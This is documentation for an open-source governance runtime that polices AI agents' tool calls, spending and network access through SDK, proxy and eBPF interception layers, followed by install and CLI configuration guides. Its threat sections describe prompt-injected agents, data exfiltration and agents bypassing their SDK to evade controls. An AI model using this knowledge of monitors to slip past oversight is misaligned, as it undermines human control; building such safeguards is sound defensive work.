agent-assembly

agent-assembly is the open-source core of the AI Agent Assembly governance platform. It enforces policy on AI agents — what they may call, spend, and connect to — and records every decision in an immutable audit trail.

This book is the contributor and operator reference for the core. If you build with a language SDK instead, read the per-SDK guides below.

New here? Start with the Introduction — it explains what Agent Assembly is, the problem it solves, the core concepts, and the three-layer interception model. Then move on to the Quick Start.

Other docs: Docs Hub · Python SDK · Node SDK · Go SDK

Run it locally

Point the gateway at a bundled reference policy and you have a governing daemon listening on 127.0.0.1:50051:

git clone https://github.com/ai-agent-assembly/agent-assembly.git
cd agent-assembly
cargo run -p aa-gateway -- --policy policy-examples/low-risk.yaml

From there, attach an SDK shim, the aa-proxy sidecar, or the eBPF layer to start intercepting agent actions. The Architecture chapter explains how those three layers fit together.

Where to go next

You want to…	Read
Understand what this is and why	Introduction
Get a gateway running quickly	Quick Start
Look up an `aasm` command	CLI Reference
Follow a task end-to-end	Usage Guide
Understand the threat model and defenses	Security Model
See how the crates fit together	Architecture
Check which SDK versions are compatible	Compatibility matrix
Read the wire-protocol contract	Protocol changelog
See latency and build-time numbers	Benchmarks — baseline

Audience

This book targets contributors and operators of agent-assembly. SDK users (Python, TypeScript, Go) should refer to the per-SDK guides in the sibling repositories.

Diagram rendering

This book renders Mermaid diagrams via the mdbook-mermaid preprocessor:

graph LR
    SDK[SDK shim] --> Gateway[aa-gateway]
    Proxy[aa-proxy] --> Gateway
    eBPF[aa-ebpf] --> Gateway
    Gateway --> Audit[(Audit log)]

Introduction

agent-assembly is a governance and security runtime for AI agents. It sits between an agent and the tools, models, and networks it reaches for, evaluates every action against policy and budget, and records the outcome in an immutable audit trail. It is the open-source core of the AI Agent Assembly platform.

This section is the place to start. It explains what the runtime is and the problem it solves, defines the handful of core concepts the rest of the book assumes, and gives a teaser of the three-layer interception model that lets the runtime see what an agent does no matter how the agent is built.

Read the pages in order:

Page	What it covers
What it is & the problem	What Agent Assembly governs, why ungoverned agent tool-use is risky, and the value proposition.
Core concepts	Agents, policies, budgets, audit — the vocabulary used throughout the book.
The three-layer model	How the SDK, sidecar proxy, and eBPF layers compose so nothing slips through.

When you are ready to run something, jump to the Quick Start. For the security rationale behind the design, read the Security Model; for the crate-level implementation, read Architecture.

What Agent Assembly is & the problem

In plain terms. AI agents act on their own — they run tools, call services, and spend money to get a job done. Agent Assembly is the set of guardrails around them: it checks every action an agent tries to take against rules you define, allows or blocks it before it happens, and keeps a permanent record of what was decided. Think of it as a security checkpoint that an AI agent cannot walk around.

It is for the people responsible for those agents — developers wiring them up, security and operations teams keeping them safe, and the planners who need to know the controls exist. With it you can decide which tools an agent may use, stop it from leaking data or overspending, and review exactly what every agent did and why.

What it is

agent-assembly is a governance-native runtime for AI agents. An AI agent — an LLM wired up to tools, APIs, shells, and network access — is given a goal and then decides, on its own, which actions to take to reach it. Agent Assembly governs those actions. Every time an agent tries to call a tool, reach the network, or spend money on a model call, the runtime evaluates that action against a policy and a budget, returns allow or deny before the action runs, and writes an immutable audit record of the decision.

A governing gateway, pointed at a reference policy, is one command away:

cargo run -p aa-gateway -- --policy policy-examples/low-risk.yaml

That daemon listens on 127.0.0.1:50051 and is ready for any interception layer to connect. The rest of this book explains how to put it to work.

The problem: ungoverned agent tool-use is risky

A traditional program does exactly what its code says. An AI agent does not. It plans its own steps at runtime, so the set of actions it might take is open-ended and not knowable in advance. The moment you give an agent real capabilities — the ability to run shell commands, hit internal APIs, call third-party services, read files, or pay for tokens — that open-endedness becomes a concrete risk:

Unbounded tool-use. An agent can invoke any tool it has been handed, in any order, with any arguments it constructs. A prompt-injected or simply confused agent may call a destructive tool it was never meant to use.
Data exfiltration. An agent that can both read sensitive data and reach the network can leak that data — intentionally coerced by an attacker, or by accident — over an outbound request. Secrets and credentials are the highest-value target.
Runaway spend. Agents loop. A planning loop that retries, fans out, or gets stuck can burn through an LLM budget in minutes with no natural stopping point.
No accountability. When an agent does something it should not have, teams need to answer what did it do, when, and was it allowed? Without a tamper-evident record of every decision, that question has no answer.
Bypass. Controls that live only inside the agent’s own code are only as trustworthy as the agent. An agent that skips the SDK, or is compromised, slips past anything that depended on its cooperation.

These risks are not hypothetical edge cases — they are the default behavior of a capable agent with no guardrails. Restricting the model’s prompt is not enough, because the model is exactly the component you cannot fully trust.

The value proposition

Agent Assembly turns “trust the agent to behave” into “the runtime enforces what the agent may do.” It provides:

Policy enforcement at the action boundary. Allow/deny decisions are made by a central gateway before an action executes, driven by declarative policy rather than agent cooperation.
Budget control. Per-team spend is tracked and enforced; a request that would breach the budget is denied, so a runaway loop is stopped, not just reported after the fact.
An immutable audit trail. Every decision — allow and deny alike — is recorded, giving teams a complete, tamper-evident account of agent behavior for debugging, incident response, and compliance.
Defense that does not depend on the agent. Enforcement is layered across three independent interception points (see the three-layer model), so governance holds even when an agent skips its SDK or actively tries to evade it.

Crucially, the agent does not have to cooperate. The whole point is that governance is enforced around the agent, by infrastructure the agent does not control. The Security Model section makes the trust boundaries explicit.

Who this book is for

This book is the reference for contributors and operators of the agent-assembly core — people running the gateway, writing policy, and deploying the interception layers. If you are instead building an application with a language SDK, start from the per-SDK guides: Python SDK, Node SDK, Go SDK.

Last updated: 2026-06-12 by Chisanan232

Core concepts

Four concepts recur throughout this book. Understanding them here makes every later chapter easier to read.

Agent

An agent is the workload being governed: an LLM-driven program that decides, at runtime, which actions to take to accomplish a goal. From the runtime’s point of view an agent is an identity that performs actions — calling a tool, making an LLM request, or reaching out over the network. Agents register with the gateway and are organized under a team and an org, which is the scope at which policy and budget are applied.

Each governed action is described by an action type (for example, a tool call or an LLM call), a target (what it is acting on), and a set of labels (metadata used by policy rules). This is the unit the runtime makes a decision about.
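As a rough illustration of that unit, the sketch below models an action as a small record and checks whether a rule matches it. The `Action` and `Rule` names, their fields, and the exact-match semantics are assumptions made for this example; they are not the gateway's real types or its policy schema.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass(frozen=True)
class Action:
    """Hypothetical model of one governed action."""
    action_type: str                            # e.g. "tool_call" or "llm_call"
    target: str                                 # what the action acts on
    labels: dict = field(default_factory=dict)  # metadata matched by rules


@dataclass(frozen=True)
class Rule:
    """Hypothetical rule: every field that is set must match the action."""
    effect: str                                 # "allow" or "deny"
    action_type: Optional[str] = None           # None matches any action type
    target: Optional[str] = None                # None matches any target
    labels: dict = field(default_factory=dict)  # labels the action must carry

    def matches(self, action: Action) -> bool:
        if self.action_type is not None and self.action_type != action.action_type:
            return False
        if self.target is not None and self.target != action.target:
            return False
        # Every label the rule names must be present with the same value.
        return all(action.labels.get(k) == v for k, v in self.labels.items())
```

A rule with no fields set matches every action, which is one simple way to express a catch-all.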

Policy

A policy is a declarative document — written in YAML or TOML — that states what agents are and are not allowed to do. Rules match on the action type, target, and labels of a request and resolve to allow or deny.

Policies are scoped and they cascade. Rules can be attached at the org, team, agent, and tool levels; when an action is evaluated, the gateway walks those scopes and merges them with a most-restrictive-wins rule, so a broad organizational deny cannot be loosened by a narrower scope. Policy is evaluated server-side, in the gateway — never by the agent or a dashboard — so the decision cannot be tampered with by the workload it governs. The reference policies under policy-examples/ are a good starting point. The detailed evaluation path is documented in Architecture.
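The most-restrictive-wins merge can be pictured with a minimal sketch. It assumes each scope has already been reduced to a single "allow" or "deny" result; the `merge_decisions` helper and the default-deny behaviour when no scope has a matching rule are assumptions of the example, not a description of the gateway's evaluator.

```python
SCOPES = ("org", "team", "agent", "tool")   # broadest to narrowest


def merge_decisions(decisions: dict) -> str:
    """Combine per-scope results; any deny wins over every allow.

    `decisions` maps a scope name to "allow" or "deny". Scopes with no
    matching rule are simply absent. Returning "deny" when nothing
    matched is an assumption of this sketch.
    """
    seen = [decisions[scope] for scope in SCOPES if scope in decisions]
    if not seen:
        return "deny"
    return "deny" if "deny" in seen else "allow"
```

With this shape, `merge_decisions({"org": "deny", "agent": "allow"})` yields `"deny"`: the narrower allow cannot loosen the broader deny.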

Budget

A budget caps how much a team may spend on agent activity, primarily the cost of LLM calls. The gateway tracks consumption per team against a cost model and treats the budget as part of the policy decision: a request that would breach the budget is downgraded from allow to deny. This makes budget a hard guardrail that stops runaway spend in the moment, rather than a billing report that arrives after the money is gone.
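The downgrade step can be sketched in a few lines. The `apply_budget` helper and its parameters are hypothetical, and treating a request that lands exactly on the limit as still allowed is an assumption; the gateway's cost model may differ.

```python
from decimal import Decimal


def apply_budget(decision: str, spent: Decimal, cost: Decimal, limit: Decimal) -> str:
    """Downgrade an allow to deny when the request would exceed the limit."""
    if decision == "allow" and spent + cost > limit:
        return "deny"
    # A policy deny stays a deny; budget never upgrades a decision.
    return decision
```

`Decimal` is used instead of `float` so that repeated small charges do not accumulate rounding error.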

Audit

The audit trail is the immutable, append-only record of every decision the gateway makes — both allows and denies — together with the action that prompted it. Because it is tamper-evident and complete, it answers the accountability question for any agent: what did it do, when, and was it permitted? Audit records use a single wire format regardless of which interception layer observed the action, so the gateway presents one unified history. Audit data underpins debugging, incident response, and compliance export.
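This book does not spell out here how tamper evidence is achieved. One common technique for append-only logs is hash chaining, where each record stores the hash of the record before it. The sketch below illustrates that general idea only; the record fields and helper names are hypothetical and are not the audit wire format.

```python
import hashlib
import json

GENESIS = "0" * 64   # placeholder "previous hash" for the first record


def _digest(body: dict) -> str:
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


def append_record(log: list, decision: str, action: dict) -> dict:
    """Append a record that commits to the hash of the previous record."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    body = {"decision": decision, "action": action, "prev": prev_hash}
    record = {**body, "hash": _digest(body)}
    log.append(record)
    return record


def verify_chain(log: list) -> bool:
    """Recompute every hash; an edited or reordered record breaks the chain."""
    prev_hash = GENESIS
    for record in log:
        body = {key: record[key] for key in ("decision", "action", "prev")}
        if record["prev"] != prev_hash or record["hash"] != _digest(body):
            return False
        prev_hash = record["hash"]
    return True
```

Changing any stored field after the fact makes `verify_chain` return `False`, which is what "tamper-evident" means in practice: edits are detectable, not impossible.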

With these four in hand (agents perform actions, policy decides allow/deny, budget caps spend, and audit records everything), the three-layer interception model explains how the runtime actually sees an agent’s actions in order to govern them.

Last updated: 2026-06-11 by Chisanan232

The three-layer interception model at a glance

To govern an action, the runtime first has to see it. Agent Assembly intercepts agent actions at three independent layers, each catching what the layers above it might miss, and routes every observed action to one central gateway for a decision. This page is a teaser; the Security Model covers why the layers are arranged this way and what each defends against, and Architecture covers how each is implemented.

The three layers

The layers are ordered along a deliberate trade-off, from lowest latency (Layer 1) to highest detection authority (Layer 3):

Layer	Runs in	Crate(s)	Latency	Catches	Trade-off
1 — SDK (in-process)	The agent’s own process	`aa-sdk-client` + per-language shims, `aa-wasm`	Lowest	What the SDK is wired into	Fastest path; but requires the agent to adopt the SDK, and an agent could skip it.
2 — Sidecar proxy	An adjacent process / sidecar	`aa-proxy`	Medium	Outbound HTTPS, with no code change	Catches network egress the SDK missed; sees only what is routed through it.
3 — eBPF (kernel)	The Linux kernel	`aa-ebpf` and friends	Highest cost	Everything else, including bypass attempts	Highest detection authority; Linux-only and needs elevated privileges.

The latency-vs-authority trade-off is the key idea. The in-process SDK is the cheapest place to make a decision, but it is also the easiest for an agent to avoid — it lives inside the very process you do not fully trust. The eBPF layer is the most expensive to run, but it watches from the kernel, below anything the agent can reach, so it catches actions the higher layers never saw — including deliberate attempts to bypass the SDK.

How they compose

The layers are not alternatives; they stack. A deployment runs whatever subset fits its constraints, and because every layer reports to the same gateway using the same audit wire format, the gateway sees one unified view no matter which layers produced the events. Coverage is the union of the layers you deploy: the SDK handles the fast common path, the proxy backstops network egress without touching agent code, and eBPF is the floor that catches what slips past both. Run all three and an action has nowhere to hide.

graph TD
    classDef agent fill:#eef2ff,stroke:#6366f1
    classDef l1 fill:#eaf6ee,stroke:#3aa55b
    classDef l2 fill:#fff3d6,stroke:#c98a00
    classDef l3 fill:#fdecea,stroke:#d75748
    classDef gw fill:#e8f1ff,stroke:#5b8def

    Agent["AI agent<br/>(tool / LLM / network calls)"]:::agent

    subgraph Interception["Three interception layers"]
        L1["Layer 1 — SDK shim<br/>in-process · lowest latency"]:::l1
        L2["Layer 2 — Sidecar proxy<br/>aa-proxy · outbound HTTPS"]:::l2
        L3["Layer 3 — eBPF<br/>kernel · highest authority"]:::l3
    end

    GW["Gateway (aa-gateway)<br/>policy · budget · decision"]:::gw
    Audit[("Immutable audit log")]

    Agent -->|"action"| L1
    Agent -.->|"network egress"| L2
    Agent -.->|"syscalls / TLS"| L3

    L1 -->|"allow / deny request"| GW
    L2 -->|"allow / deny request"| GW
    L3 -->|"audit-only events"| GW

    GW -->|"ALLOW / DENY"| Agent
    GW --> Audit

The gateway is the single brain behind all three: it holds the agent registry, evaluates policy, enforces budgets, and appends the audit record before answering allow or deny.

Where to go next

Security Model — the threat model and why this layered defense closes the gaps, including what each layer is and is not trusted to do.
Architecture — the crate-level how: the gateway, the policy engine, the transports, and the full interception data flow.

Last updated: 2026-06-11 by Chisanan232

Requirements

Before you install Agent Assembly, make sure your machine meets the prerequisites below. The CLI and the governing gateway run on macOS and Linux; only the kernel-level eBPF interception layer is Linux-only.

At a glance

You want to…	You need
Install and run the `aasm` CLI from a release	A supported OS (macOS or Linux) — nothing else
Build the workspace from source	Rust stable ≥ 1.75, `protoc`, and a C toolchain
Run the SDK or sidecar-proxy interception layers	macOS or Linux
Run the eBPF interception layer	Linux only — a recent kernel with BTF and a nightly Rust toolchain

Supported platforms

The three interception layers have different platform reach. The SDK shim and the sidecar proxy (aa-proxy) run anywhere the runtime builds; kernel-level eBPF interception is Linux-only.

Platform	Runtime / CLI	Sidecar proxy (`aa-proxy`)	eBPF interception
Linux (x86_64 / arm64)	✅	✅	✅ — kernel with BTF + nightly toolchain
macOS (Apple Silicon / Intel)	✅	✅	❌ — Linux-only
Windows	⚠️ via WSL2	⚠️ via WSL2	⚠️ via WSL2

On macOS, governance is enforced through the SDK and proxy layers; the eBPF layer is unavailable. See aa-ebpf/README.md for kernel requirements.
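The platform table can be expressed as a small lookup, for example in a deployment script that decides which layers to enable. This is a sketch: the layer names and the `available_layers` helper are hypothetical, and it checks only the operating system, not the kernel BTF or nightly-toolchain requirements of the eBPF layer.

```python
import platform
from typing import Optional

# Keys are the values returned by platform.system().
LAYERS_BY_OS = {
    "Linux": ("sdk", "proxy", "ebpf"),
    "Darwin": ("sdk", "proxy"),        # macOS: the eBPF layer is unavailable
}


def available_layers(system: Optional[str] = None) -> tuple:
    """Return the interception layers that can run on the given OS."""
    system = system or platform.system()
    # Native Windows is not listed; inside WSL2 platform.system() reports "Linux".
    return LAYERS_BY_OS.get(system, ())
```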

Installing the CLI only

If you just want the aasm operator CLI from a published release, you need nothing more than a supported OS. The quick-install script downloads a pre-built binary for x86_64/aarch64 on macOS (apple-darwin) and Linux (unknown-linux-gnu). Jump straight to Installation.

Building from source

To build the Cargo workspace yourself — for development, or to run the gateway via cargo run — install the following.

Required

Rust stable, ≥ 1.75 — install via rustup. The workspace uses the 2021 edition.
protoc — the Protocol Buffers compiler, required by the aa-proto and aa-gateway build scripts.
- macOS: brew install protobuf
- Debian / Ubuntu: apt-get install protobuf-compiler

Recommended developer tooling

These are not needed to run the CLI but are used by the test and contribution workflow:

cargo-nextest — the test runner used across the workspace.
cargo-deny — dependency and license checks.
Lefthook — git pre-commit / pre-push hooks.

Linux-only build dependencies

On Linux, the native-TLS path in aa-proxy additionally requires:

pkg-config
libssl-dev (Debian/Ubuntu) or openssl-devel (RHEL-family)

Requirements per interception layer

Each interception layer can be deployed independently. Pick the layers you need and install only their requirements.

Layer	What it does	Requirements
SDK shim (in-process)	Fastest path; the agent adopts a language SDK that reports to the gateway	The relevant SDK: python-sdk, node-sdk, or go-sdk. Runs on macOS or Linux.
Sidecar proxy (`aa-proxy`)	Intercepts outbound HTTPS via MitM with a per-host CA — no code changes	macOS or Linux. On Linux, `pkg-config` + `libssl-dev`/`openssl-devel`.
eBPF (kernel)	Catches everything else, including bypass attempts	Linux only. A recent kernel with BTF enabled and a nightly Rust toolchain to build the BPF-target crates. Not available on macOS.

The eBPF caveat. The aa-ebpf-probes and aa-ebpf-programs crates compile for the bpfel-unknown-none target and are intentionally outside the host Cargo workspace. They cannot be selected with cargo -p and do not build on macOS. If you are on macOS, you can still run and govern agents through the SDK and proxy layers — you simply do not get the kernel-level layer.

With the prerequisites in place, continue to Installation.

Last updated: 2026-06-11 by Chisanan232

Installation

This page covers every supported way to get the aasm CLI onto your machine, then how to verify it works. Pick one method:

Method	Best for	Needs a published release?
Quick-install script	Fast, reproducible install on macOS / Linux	Yes
Homebrew tap	macOS / Linux users who already use Homebrew	Yes
Pre-built binaries	Air-gapped or scripted installs, custom verification	Yes
`cargo install` / from source	Contributors and bleeding-edge builds	No

Alpha note. Agent Assembly is in the v0.0.1 pre-release series; published releases are GitHub pre-releases. The public API and wire protocol are not yet stable — do not use in production.

Quick-install script

The one-line installer downloads the matching pre-built tarball plus its SHA256SUMS file from the GitHub Release, verifies the checksum, and installs the aasm binary:

curl -sSf https://raw.githubusercontent.com/ai-agent-assembly/agent-assembly/master/scripts/install-cli.sh | sh

By default the binary is installed to /usr/local/bin if that directory is writable, otherwise to ~/.local/bin (always user-writable, no sudo needed). The installer script lives in the repo at scripts/install-cli.sh.
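The default-directory rule described above amounts to a writability check. The sketch below restates it in Python for illustration; the installer itself is a shell script, and `default_install_dir` is a hypothetical helper, not part of it.

```python
import os
from pathlib import Path


def default_install_dir(system_dir: str = "/usr/local/bin") -> Path:
    """Prefer the system directory when it is writable, else ~/.local/bin."""
    if os.path.isdir(system_dir) and os.access(system_dir, os.W_OK):
        return Path(system_dir)
    return Path.home() / ".local" / "bin"
```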

A short hosted alias, https://install.ai-agent-assembly.dev, is planned but not yet live. Use the raw.githubusercontent.com URL above for now.

If the install directory is not on your PATH, the script prints the line to add to your shell profile, for example:

export PATH="$HOME/.local/bin:$PATH"

Pin a version or change the install directory

The installer honors these environment variables:

# Install a specific release tag (default: latest).
# The variable is set on the `sh` side of the pipe so that it reaches the installer;
# a prefix on `curl` would apply to curl only.
curl -sSf https://raw.githubusercontent.com/ai-agent-assembly/agent-assembly/master/scripts/install-cli.sh | AASM_VERSION=v0.0.1-alpha.5 sh

# Install to a custom directory
curl -sSf https://raw.githubusercontent.com/ai-agent-assembly/agent-assembly/master/scripts/install-cli.sh | AASM_INSTALL_DIR=/usr/local/bin sh

Variable	Default	Purpose
`AASM_INSTALL_DIR`	`/usr/local/bin` or `~/.local/bin`	Installation directory
`AASM_VERSION`	latest	Specific release tag to install
`AASM_REQUIRE_SIGNATURE`	`0`	When `1`, a missing cosign signature aborts the install (see below)
`AASM_NO_MODIFY_PATH`	`0`	When `1`, suppress the `PATH` hint

Supply-chain verification (checksum + cosign)

The installer always enforces a SHA-256 checksum: it downloads SHA256SUMS and aborts if the tarball’s hash does not match. The checksum file itself is additionally signed with cosign (keyless, via GitHub OIDC — Fulcio cert + Rekor log). If cosign is installed locally, the installer verifies that signature against the release workflow’s identity before trusting the checksums. To make a missing/unverifiable signature fatal:

curl -sSf https://raw.githubusercontent.com/ai-agent-assembly/agent-assembly/master/scripts/install-cli.sh | AASM_REQUIRE_SIGNATURE=1 sh

Releases published before signing was added carry no cosign bundle; with the default AASM_REQUIRE_SIGNATURE=0 the installer warns and falls back to checksum-only (the SHA-256 check is never skipped).
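For readers who want to see what the checksum step amounts to, here is a minimal sketch of the same check in Python. It assumes SHA256SUMS uses the conventional `sha256sum` layout of one `<hex digest>  <file name>` pair per line; the helper names are hypothetical and this is not the installer's code.

```python
import hashlib


def expected_digest(sums_text: str, asset: str) -> str:
    """Return the hex digest listed for `asset` in SHA256SUMS-style text."""
    for line in sums_text.splitlines():
        parts = line.split()
        # Binary-mode entries prefix the file name with "*".
        if len(parts) == 2 and parts[1].lstrip("*") == asset:
            return parts[0].lower()
    raise KeyError(f"{asset} is not listed in the checksum file")


def verify_sha256(data: bytes, sums_text: str, asset: str) -> bool:
    """Compare the SHA-256 of `data` with the digest listed for `asset`."""
    return hashlib.sha256(data).hexdigest() == expected_digest(sums_text, asset)
```

A checksum only proves the tarball matches the checksum file; the cosign signature is what ties the checksum file to the release workflow.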

Homebrew (macOS / Linux)

Install the latest tagged aasm release from the Homebrew tap:

brew install ai-agent-assembly/homebrew-agent-assembly/aasm

Pre-built binaries (manual)

Each GitHub Release publishes per-platform tarballs plus a SHA256SUMS file and a SHA256SUMS.cosign.bundle signature. Tarballs are named aasm-<arch>-<os>.tar.gz, where <arch> is x86_64 or aarch64 and <os> is apple-darwin (macOS) or unknown-linux-gnu (Linux).
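A scripted install usually needs to derive the tarball name for the current machine. The sketch below follows the naming pattern above; the `asset_name` helper and the mapping from `platform.machine()` values to release architectures are assumptions of the example.

```python
import platform
from typing import Optional

# platform.machine() reports "arm64" on Apple Silicon and "aarch64" on Linux ARM.
ARCHES = {"x86_64": "x86_64", "amd64": "x86_64", "arm64": "aarch64", "aarch64": "aarch64"}
OSES = {"Darwin": "apple-darwin", "Linux": "unknown-linux-gnu"}


def asset_name(system: Optional[str] = None, machine: Optional[str] = None) -> str:
    """Build the release tarball name, aasm-<arch>-<os>.tar.gz."""
    system = system or platform.system()
    machine = (machine or platform.machine()).lower()
    try:
        return f"aasm-{ARCHES[machine]}-{OSES[system]}.tar.gz"
    except KeyError:
        raise ValueError(f"no pre-built tarball for {system}/{machine}") from None
```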

To install and verify by hand:

VERSION=v0.0.1-alpha.5
ASSET=aasm-aarch64-apple-darwin.tar.gz   # adjust for your platform
BASE="https://github.com/ai-agent-assembly/agent-assembly/releases/download/${VERSION}"

curl -sSfL "${BASE}/${ASSET}"        -o "${ASSET}"
curl -sSfL "${BASE}/SHA256SUMS"      -o SHA256SUMS

# Verify the checksum (use sha256sum on Linux, shasum -a 256 on macOS)
shasum -a 256 -c <(grep "${ASSET}" SHA256SUMS)

# (Optional) Verify the cosign signature on the checksum file
curl -sSfL "${BASE}/SHA256SUMS.cosign.bundle" -o SHA256SUMS.cosign.bundle
cosign verify-blob \
  --bundle SHA256SUMS.cosign.bundle \
  --certificate-identity-regexp '^https://github\.com/ai-agent-assembly/agent-assembly/\.github/workflows/release\.yml@refs/tags/v.*$' \
  --certificate-oidc-issuer 'https://token.actions.githubusercontent.com' \
  SHA256SUMS

tar -xzf "${ASSET}" aasm
mkdir -p ~/.local/bin                    # the directory may not exist yet
install -m755 aasm ~/.local/bin/aasm

Build from source

Contributors and anyone who wants the bleeding edge can build from the Cargo workspace. This needs the build prerequisites (Rust ≥ 1.75 and protoc).

git clone https://github.com/ai-agent-assembly/agent-assembly.git
cd agent-assembly
cargo build -p aa-cli            # produces ./target/debug/aasm

The compiled binary is at ./target/debug/aasm. Add it to your PATH or run it by path. You can also install it onto your PATH with Cargo:

cargo install --path aa-cli      # installs `aasm` into ~/.cargo/bin

The eBPF-target crates (aa-ebpf-probes, aa-ebpf-programs) are intentionally outside the workspace and are not built by cargo build -p aa-cli. See Requirements.

Verify the install

Confirm the binary is on your PATH and runs:

$ aasm --version
aasm 0.0.1-alpha.5

A fuller report — the CLI version plus whether a gateway and API are reachable — comes from aasm version. With no control plane running yet, both report unreachable, which is expected at this point:

$ aasm version
+-----------+---------------+-------------+
| COMPONENT | VERSION       | STATUS      |
+=========================================+
| cli       | 0.0.1-alpha.5 | -           |
|-----------+---------------+-------------|
| gateway   | -             | unreachable |
|-----------+---------------+-------------|
| api       | -             | unreachable |
+-----------+---------------+-------------+

List the available commands with aasm --help:

$ aasm --help
aasm — command-line tool for Agent Assembly

Usage: aasm [OPTIONS] <COMMAND>

Commands:
  admin       Gateway administrative operations
  agent       Manage monitored agent processes
  alerts      Manage governance alerts
  audit       Query audit log entries and export compliance reports
  ...
  status      Show fleet health, agents, approvals, and budget at a glance
  topology    Visualize agent topology, trees, lineage, and statistics
  gateway     Manage the aa-gateway governance daemon — agent registry, policy engine, audit log
  start       Start the locally-managed Agent Assembly gateway process
  version     Show CLI and gateway version information
  ...

Troubleshooting

Symptom	Cause	Fix
`aasm: command not found`	Install dir not on `PATH`	Add the install dir to `PATH` (the installer prints the exact line)
`could not determine latest release`	The repo has no published release yet, or a network/API issue	Pin a tag with `AASM_VERSION=...`, or check the releases page
`SHA256 mismatch`	Corrupted or tampered download	Re-download; do not install. Report it if it persists
`cosign signature verification FAILED`	Bad or wrong-identity signature	Do not install; report it

Now configure the CLI to talk to your gateway — see Configuration.

Last updated: 2026-06-12 by Chisanan232

Configuration

The aasm CLI works with zero configuration — if you never create a config file, it talks to a gateway API at http://localhost:8080. This page covers the config file format, named contexts (connection profiles), the environment variables the CLI reads, and the separate agent-assembly.toml runtime config the gateway consumes.

Where the CLI connects, and how it decides

Every CLI command that talks to the control plane resolves three things — the API URL, an optional API key, and an output format — from the following sources, highest priority first:

Explicit flags: --api-url, --api-key.
A named context selected with --context <name>, or the default_context from the config file.
The built-in default API URL: http://localhost:8080.

So aasm status with no flags and no config file connects to http://localhost:8080. A --api-url flag always wins over any context.
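The precedence order can be sketched as a small resolver. This is an illustration only: `resolve_connection` is a hypothetical helper, `flags` and `config` are plain dicts standing in for parsed command-line flags and ~/.aa/config.yaml, and two behaviours are assumptions of the sketch, namely that the URL and key are resolved independently and that an unknown context name silently falls through to the default.

```python
from typing import Optional, Tuple

DEFAULT_API_URL = "http://localhost:8080"


def resolve_connection(flags: dict, config: dict) -> Tuple[str, Optional[str]]:
    """Return (api_url, api_key), taking the highest-priority source first."""
    # 2. A context named on the command line, else the configured default.
    name = flags.get("context") or config.get("default_context")
    context = config.get("contexts", {}).get(name, {}) if name else {}
    # 1. Explicit flags win; 3. the built-in default URL is the last resort.
    api_url = flags.get("api_url") or context.get("api_url") or DEFAULT_API_URL
    api_key = flags.get("api_key") or context.get("api_key")
    return api_url, api_key
```

With no flags and an empty config, the function returns `("http://localhost:8080", None)`, matching the zero-configuration behaviour described above.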

The CLI config file: `~/.aa/config.yaml`

CLI configuration lives at ~/.aa/config.yaml. The file is optional; if it is absent the CLI uses defaults. Its schema:

# Name of the context used when --context is not given (optional).
default_context: local

# Named connection profiles. Each has an api_url and an optional api_key.
contexts:
  local:
    api_url: http://localhost:8080
  production:
    api_url: https://api.example.com
    api_key: secret123        # optional; omit for unauthenticated endpoints

# Settings for `aasm dashboard start` (optional; shown with defaults).
dashboard:
  port: 3000
  auto_open: false

Key	Type	Default	Purpose
`default_context`	string	(none)	Context used when `--context` is not passed
`contexts.<name>.api_url`	string	—	Base URL of the gateway API for this context
`contexts.<name>.api_key`	string	(none)	Bearer token sent with requests for this context
`dashboard.port`	integer	`3000`	Port the embedded dashboard SPA server listens on
`dashboard.auto_open`	bool	`false`	Open the browser automatically after the dashboard is ready

Named contexts (connection profiles)

A context is a named API URL + key, so you can switch between, say, a local gateway and a hosted one without retyping flags. Manage contexts with aasm context; the commands read and write ~/.aa/config.yaml for you.

Create or update contexts:

$ aasm context set local --api-url http://localhost:8080
Context 'local' saved.

$ aasm context set production --api-url https://api.example.com --api-key secret123
Context 'production' saved.

Choose the default context:

$ aasm context use local
Switched to context 'local'.

List them (the * marks the default; keys are never printed, only flagged as set):

$ aasm context list
local *  http://localhost:8080
production  https://api.example.com (key set)

Once a default is set, every command uses it. Override per-invocation with --context:

aasm status                       # uses default context (local)
aasm status --context production  # one-off against production
aasm status --api-url http://localhost:9090   # ad-hoc URL, ignores contexts

Environment variables

The CLI reads these environment variables. Where one overlaps a flag or config value, the precedence is noted.

Variable	Used by	Precedence
`AASM_DASHBOARD_PORT`	`aasm dashboard`	Highest — beats `--port` and `dashboard.port` in config
`AASM_VERSION` / `AASM_INSTALL_DIR`	the install script	Installer only
`AA_POLICY`	`aasm gateway start`	Default policy path; overridden by `--policy`
`AA_DATA_DIR`	gateway / proxy / dashboard	Directory for PID files and managed-process state
`AA_PROXY_ADDR`	`aasm proxy start`	Proxy listen address (default `127.0.0.1:8899`)
`AA_GATEWAY_URL`	`aasm proxy start`	Gateway URL the proxy reports to
`AA_CA_DIR`	`aasm proxy`	Per-host CA material directory

Note the two prefixes: AASM_* variables configure the CLI surface, while AA_* variables configure the underlying daemons the CLI launches (gateway, proxy). They are not interchangeable.
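The precedence listed for `AASM_DASHBOARD_PORT` is unusual in that the environment variable beats the flag, so a short sketch may help. `resolve_dashboard_port` is a hypothetical helper written for this example; `config` is a dict standing in for the parsed config file.

```python
import os
from typing import Mapping, Optional


def resolve_dashboard_port(
    flag_port: Optional[int],
    config: Mapping,
    env: Optional[Mapping] = None,
) -> int:
    """Environment variable first, then --port, then config, then 3000."""
    env = os.environ if env is None else env
    raw = env.get("AASM_DASHBOARD_PORT")
    if raw:
        return int(raw)
    if flag_port is not None:
        return flag_port
    return int(config.get("dashboard", {}).get("port", 3000))
```

If a dashboard comes up on an unexpected port, a leftover `AASM_DASHBOARD_PORT` in the shell environment is the first thing to check.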

Output format

Most list/get commands accept --output table|json|yaml (default table). Use json or yaml for scripting:

$ aasm version --output json
[
  {
    "component": "cli",
    "version": "0.0.1-alpha.5",
    "status": "-"
  },
  ...
]
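In a script, the JSON form can be consumed with a few lines of Python. The sketch assumes the output is a list of objects with `component`, `version`, and `status` keys, as in the sample above; `component_status` is a hypothetical helper, and the schema is not a stable contract in the alpha series.

```python
import json


def component_status(report_json: str, component: str) -> dict:
    """Find one component's entry in `aasm version --output json` output."""
    for entry in json.loads(report_json):
        if entry.get("component") == component:
            return entry
    raise KeyError(component)
```

In practice the input would come from something like `subprocess.run(["aasm", "version", "--output", "json"], capture_output=True, text=True).stdout`.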

Gateway runtime config: `agent-assembly.toml`

The CLI config above is about how the CLI connects. The gateway itself reads a separate runtime config — agent-assembly.toml — that selects its persistence backends. A starter file ships at the repo root as agent-assembly.toml.example:

# agent-assembly.toml — example runtime configuration
[storage]
